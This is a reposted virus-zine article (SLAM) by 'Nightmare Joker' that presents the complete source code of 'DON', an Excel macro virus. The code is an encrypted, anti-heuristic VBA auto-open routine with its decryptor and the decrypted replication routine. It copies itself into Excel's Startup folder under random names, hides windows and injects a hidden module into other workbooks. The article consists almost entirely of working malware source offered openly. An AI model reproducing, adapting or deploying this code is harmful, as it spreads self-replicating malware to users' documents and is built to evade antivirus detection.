SLAM3.034: Anti Heuristic Excel Virus DON by Nightmare Joker [SLAM]

eZine lover (@eZine)

Published in

Slam

· 26 Feb 2022

[ ExcelMacro. DON ]

---------------------------------------------- 

˛ VIRUS NAME:     DON 
˛ ORIGIN:         Germany 
˛ AUTHOR:         Nightmare Joker 

->Self Modifying  No 
->Stealth         Yes 
->Encrypted       Yes (Anti-Heuristic code) 
->Retro           No 

----------------------------------------------

Here is it. The first anti heuristic excel virus *DON*. The virus decrypts after the start immediately the main code of the infection routine and insert it into a new module. The virus runs the module, infect a new document and delete it immediately again. The file name of the main virus document within the Startup directory from Excel changes at every infection.

Well, *DON* contains still some bugs, but that's nothing that couldn't become changed. I will release a new version in the next SLAM Issue. So, look now on the *not commented* source code (had at last to less time). :(

Dim Shared DON$(48) 

Sub Auto_Open() 
On Error Resume Next 
Dim k0$, j0$, a0$, b0$ 
Dim mo As Module 
Set w = Application.ActiveWorkbook 
Open "\DON2.txt" For Output As #1 
Print #1, w.Name 
Close #1: a0$ = ActiveWorkbook.Path 
b0$ = Application.StartupPath 
ChDir b0$: dat0$ = Dir(b0$ + "\" + "*.don"): ChDir a0$ 
If w.Name = dat0$ Then 
    Application.OnSheetDeactivate = Workbooks(dat0$).Name & "!DON.Auto_Open" 
End If 
Application.ScreenUpdating = False 
Windows(dat0$).Visible = True 
DON$(0) = "ÿ˙Á•◊ÍıÒÓËÊ˘Í∂≠Æ" 
DON$(1) = "‘Û• ˜˜Ù˜•◊Í¯˙ÚÍ•”Í˝˘" 
DON$(2) = "…ÓÚ•È©±•Í©±•”©±•Ì©±•©±•ÈÊ˘©±•Ê∂©±•Ê∑©" 
DON$(3) = "ÿÍ˘•Ê•¬•∆ııÒÓËÊ˘ÓÙÛ≥∆Ë˘Ó˚Í‹Ù˜ÁÙÙ" 
DON$(4) = "Ê∑©•¬•∆ııÒÓËÊ˘ÓÙÛ≥…ÍÎÊ˙Ò˘ÀÓÒÍ’Ê˘Ì" 
DON$(5) = "È©•¬•∆ııÒÓËÊ˘ÓÙÛ≥⁄¯Í˜”ÊÚÍ" 
DON$(6) = "Í©•¬•“ÓÈ©≠È©±•∂±•∂Æ" 
DON$(7) = "ŒÎ•Í©•¡√•»Ì˜©≠∏∑Æ•ŸÌÍÛ" 
DON$(8) = "••ÛÛ•¬•◊ÛÈ≠Æø•”©•¬•ß·ß•∞•—Ÿ˜ÓÚ©≠◊Ÿ˜ÓÚ©≠◊ÓÏÌ˘©≠ÿ˘˜©≠ÛÛÆ±•∫ÆÆÆ•∞•ß≥ÈÙÛßø•Ì©•¬•◊ÓÏÌ˘©≠”©±•æÆ" 
DON$(9) = "••∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠Ê≥”ÊÚÍÆ≥ÿÊ˚Í»Ùı˛∆¯•∆ııÒÓËÊ˘ÓÙÛ≥ÿ˘Ê˜˘˙ı’Ê˘Ì•∞•”©" 
DON$(10) = "••∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≥‘ıÍÛ•≠∆ııÒÓËÊ˘ÓÙÛ≥ÿ˘Ê˜˘˙ı’Ê˘Ì•∞•”©Æ" 
DON$(11) = "••ÿÌÍÍ˘¯≠ß◊ÍıÒÓËÊ˘ÍßÆ≥ÿÍÒÍË˘" 
DON$(12) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•ÀÊÒ¯Í" 
DON$(13) = "••∆Ë˘Ó˚Í‹ÓÛÈÙ¸≥ÿÍÒÍË˘ÍÈÿÌÍÍ˘¯≥…ÍÒÍ˘Í" 
DON$(14) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•Ÿ˜˙Í" 
DON$(15) = "••‹ÓÛÈÙ¸¯≠Ì©Æ≥€Ó¯ÓÁÒÍ•¬•ÀÊÒ¯Í" 
DON$(16) = "••∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠Ì©Æ≥ÿÊ˚Íø•©•¬•»Ì˜©≠∏∑Æ•∞•È©" 
DON$(17) = "••‹Ó˘Ì•∆ııÒÓËÊ˘ÓÙÛ" 
DON$(18) = "••••≥⁄¯Í˜”ÊÚÍ•¬•©" 
DON$(19) = "•• ÛÈ•‹Ó˘Ì" 
DON$(20) = " ÛÈ•ŒÎ" 
DON$(21) = "‘ıÍÛ•ß·…‘”∑≥˘˝˘ß•ÀÙ˜•ŒÛı˙˘•∆¯•®∂" 
DON$(22) = "—ÓÛÍ•ŒÛı˙˘•®∂±•ÿÌÍÍ˘”ÊÚÍ©" 
DON$(23) = "»ÒÙ¯Í•®∂" 
DON$(24) = "ÀÙ˜•Ú•¬•∂•ŸÙ•∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥“ÙÈ˙ÒÍ¯≥»Ù˙Û˘" 
DON$(25) = "ŒÎ•∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥“ÙÈ˙ÒÍ¯≠ÚÆ≥”ÊÚÍ•¬•ß…‘”ß•ŸÌÍÛ" 
DON$(26) = "••…’•¬•∂" 
DON$(27) = " ÛÈ•ŒÎ" 
DON$(28) = "”Í˝˘•Ú" 
DON$(29) = "ŒÎ•…’•¬•µ•ŸÌÍÛ" 
DON$(30) = "••Ê∂©•¬•∆ııÒÓËÊ˘ÓÙÛ≥ÿ˘Ê˜˘˙ı’Ê˘Ìø•»Ì…Ó˜•Ê∂©" 
DON$(31) = "••ÈÊ˘©•¬•…Ó˜≠Ê∂©•∞•ß·ß∞•ßØ≥ÈÙÛßÆ" 
DON$(32) = "••»Ì…Ó˜©•Ê∑©ø•‹ÓÛÈÙ¸¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥€Ó¯ÓÁÒÍ•¬•Ÿ˜˙Íø•‹ÓÛÈÙ¸¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥∆Ë˘Ó˚Ê˘Í" 
DON$(33) = "••∆Ë˘Ó˚Í‹Ù˜ÁÙÙ≥“ÙÈ˙ÒÍ¯≥∆ÈÈ" 
DON$(34) = "••ÿÍ˘•˘•¬•∆ııÒÓËÊ˘ÓÙÛ≥∆Ë˘Ó˚ÍÿÌÍÍ˘" 
DON$(35) = "••∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠ÈÊ˘©Æ≥“ÙÈ˙ÒÍ¯≠ß…‘”ßÆ≥»Ùı˛•ÊÎ˘Í˜ø¬∆Ë˘Ó˚Í‹Ù˜ÁÙÙ≥“ÙÈ˙ÒÍ¯≠∂Æ" 
DON$(36) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•ÀÊÒ¯Í" 
DON$(37) = "••ÿÌÍÍ˘¯≠˘≥”ÊÚÍÆ≥ÿÍÒÍË˘" 
DON$(38) = "••∆Ë˘Ó˚Í‹ÓÛÈÙ¸≥ÿÍÒÍË˘ÍÈÿÌÍÍ˘¯≥…ÍÒÍ˘Í" 
DON$(39) = "••ÿÌÍÍ˘¯≠ß…‘”ßÆ≥ÿÍÒÍË˘" 
DON$(40) = "••∆Ë˘Ó˚Í‹ÓÛÈÙ¸≥ÿÍÒÍË˘ÍÈÿÌÍÍ˘¯≥€Ó¯ÓÁÒÍ•¬•ÀÊÒ¯Í" 
DON$(41) = "••∆ııÒÓËÊ˘ÓÙÛ≥∆Ë˘Ó˚Í‹Ù˜ÁÙÙ≥ÿÊ˚Í" 
DON$(42) = "••‹ÓÛÈÙ¸¯≠ÈÊ˘©Æ≥∆Ë˘Ó˚Ê˘Íø•ÿÌÍÍ˘¯≠ß◊ÍıÒÓËÊ˘ÍßÆ≥…ÍÒÍ˘Í" 
DON$(43) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•Ÿ˜˙Í" 
DON$(44) = "••‹ÓÛÈÙ¸¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥€Ó¯ÓÁÒÍ•¬•Ÿ˜˙Í" 
DON$(45) = " ÛÈ•ŒÎ" 
DON$(46) = "∆ııÒÓËÊ˘ÓÙÛ≥‹Ù˜ÁÙÙ¯≠ÿÌÍÍ˘”ÊÚÍ©Æ≥ÿÊ˚Í" 
DON$(47) = "–ÓÒÒ•ß·…‘”≥˘˝˘ßø•–ÓÒÒ•ß·…‘”∑≥˘˝˘ß" 
DON$(48) = " ÛÈ•ÿ˙Á" 
Open "\DON.txt" For Output As #1 
    For X = 0 To 48 
        j0$ = decrypt(DON$(X)) 
        Print #1, j0$ 
    Next X 
Close #1 
Modules.Add: Randomize 
ActiveSheet.InsertFile Filename:="\DON.txt" 
Set N = Application.ActiveSheet 
Sheets(N.Name).Name = "Replicate" 
For Each mo In Modules 
    Run mo.Name + "!Replicate1" 
Next 
Application.DisplayAlerts = False 
Sheets("Replicate").Select 
ActiveWindow.SelectedSheets.Delete 
Application.DisplayAlerts = True 
Windows(dat0$).Save 
Windows(dat0$).Visible = False 
Application.ScreenUpdating = True 
'DON by NJ [SLAM] 
End Sub 

Function decrypt(k0$) 
For i = 1 To Len(k0$) 
    b = Asc(Mid$(k0$, i, 1)) 
    If b = 121 Then b = 13 
    c = b - 133 
    If c < 0 Then GoTo Continue 
    d0$ = d0$ + Chr$(c) 
Continue: 
Next i 
decrypt = d0$ 
End Function 

---------------------------------------------------------------------------- 
That's the derypted code of the Array. (main infection routine) 
---------------------------------------------------------------------------- 

Sub Replicate1() 
On Error Resume Next 
Dim d$, e$, N$, h$, k$, dat$, a1$, a2$ 
Set a = Application.ActiveWorkbook 
a2$ = Application.DefaultFilePath 
d$ = Application.UserName 
e$ = Mid$(d$, 1, 1) 
If e$ <> Chr$(32) Then 
  nn = Rnd(): N$ = "\" + LTrim$(RTrim$(Right$(Str$(nn), 5))) + ".don": h$ = Right$(N$, 9) 
  Application.Workbooks(a.Name).SaveCopyAs Application.StartupPath + N$ 
  Application.Workbooks.Open (Application.StartupPath + N$) 
  Sheets("Replicate").Select 
  Application.DisplayAlerts = False 
  ActiveWindow.SelectedSheets.Delete 
  Application.DisplayAlerts = True 
  Windows(h$).Visible = False 
  Application.Workbooks(h$).Save: k$ = Chr$(32) + d$ 
  With Application 
    .UserName = k$ 
  End With 
End If 
Open "\DON2.txt" For Input As #1 
Line Input #1, SheetName$ 
Close #1 
For m = 1 To Application.Workbooks(SheetName$).Modules.Count 
If Application.Workbooks(SheetName$).Modules(m).Name = "DON" Then 
  DP = 1 
End If 
Next m 
If DP = 0 Then 
  a1$ = Application.StartupPath: ChDir a1$ 
  dat$ = Dir(a1$ + "\" + "*.don") 
  ChDir$ a2$: Windows(SheetName$).Visible = True: Windows(SheetName$).Activate 
  ActiveWorkbook.Modules.Add 
  Set t = Application.ActiveSheet 
  Application.Workbooks(dat$).Modules("DON").Copy after:=ActiveWorkbook.Modules(1) 
  Application.DisplayAlerts = False 
  Sheets(t.Name).Select 
  ActiveWindow.SelectedSheets.Delete 
  Sheets("DON").Select 
  ActiveWindow.SelectedSheets.Visible = False 
  Application.ActiveWorkbook.Save 
  Windows(dat$).Activate: Sheets("Replicate").Delete 
  Application.DisplayAlerts = True 
  Windows(SheetName$).Visible = True 
End If 
Application.Workbooks(SheetName$).Save 
Kill "\DON.txt": Kill "\DON2.txt" 
End Sub 

----------------------------------------------------------------------------